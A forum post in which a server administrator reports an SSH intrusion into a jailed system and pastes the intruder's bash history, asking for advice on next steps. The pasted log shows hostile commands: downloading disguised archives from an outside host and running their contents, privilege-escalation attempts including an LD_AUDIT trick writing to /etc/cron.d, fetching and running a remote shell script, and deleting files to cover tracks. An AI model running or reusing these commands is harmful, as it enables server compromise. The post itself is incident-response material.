Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file:

w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0  
dpkg -S /lib/libpcprofile.so 
ls -l /lib/libpcprofile.so 
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh 
vi a.sh 
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh .  ..  a.sh  .cache  ubuntu10.sh  ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd

The system is in a jail. Does it matter in the current case? What shall i do?

Thanks for everyone!!

I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines